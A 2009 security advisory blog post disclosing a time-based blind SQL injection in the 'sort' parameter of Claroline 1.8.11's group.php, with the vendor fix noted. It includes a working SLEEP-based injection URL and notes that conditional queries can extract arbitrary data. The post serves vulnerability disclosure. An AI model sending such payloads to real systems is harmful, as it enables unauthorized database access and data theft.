Tuesday, May 12, 2009

Claroline v.1.8.11 SQL Injection

Author: Gerendi Sandor Attila (http://gsasec.blogspot.com/)
Date: May 05, 2009
Package: Claroline (1.8.11)
Product Homepage: http://www.claroline.net/
Versions Affected: v.1.8.11 (Other versions may also be affected)
Severity: High

The 'sort' parameter from '/claroline/group/group.php' is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Example, the request:
http://somehost/claroline/group/group.php?cidReq=TEST1&sort=IF(FALSE,1,SLEEP(10))&dir=3
will generate the flowing SQL query:
      SELECT * FROM `c_TEST1_group_team` `g`

# retrieve the tutor id
LEFT JOIN `claroline_1_8_11`.`cl_user` AS `tutor`
ON `tutor`.`user_id` = `g`.`tutor`

# retrieve the user group(s)
LEFT JOIN `c_TEST1_group_rel_team_user` AS `ug`
ON `ug`.`team` = `g`.`id` AND `ug`.`user` = 0

# count the registered users in each group
LEFT JOIN `c_TEST1_group_rel_team_user` `ug2`
ON `ug2`.`team` = `g`.`id`

GROUP BY `g`.`id`
ORDER BY IF(FALSE,1,SLEEP(10)) DESC LIMIT 0, 20
This query will lag about 10 seconds. Replacing the FALSE element (from IF(FALSE,1,SLEEP(10))) with conditional queries may be used to extract arbitrary data from the database.

Status:
1. Contacted the author at: May 07, 2009 via http://forum.claroline.net/.
2. The author fixed the problem, read at: Re: Claroline v.1.8.11 SQL Injection

No comments:

Post a Comment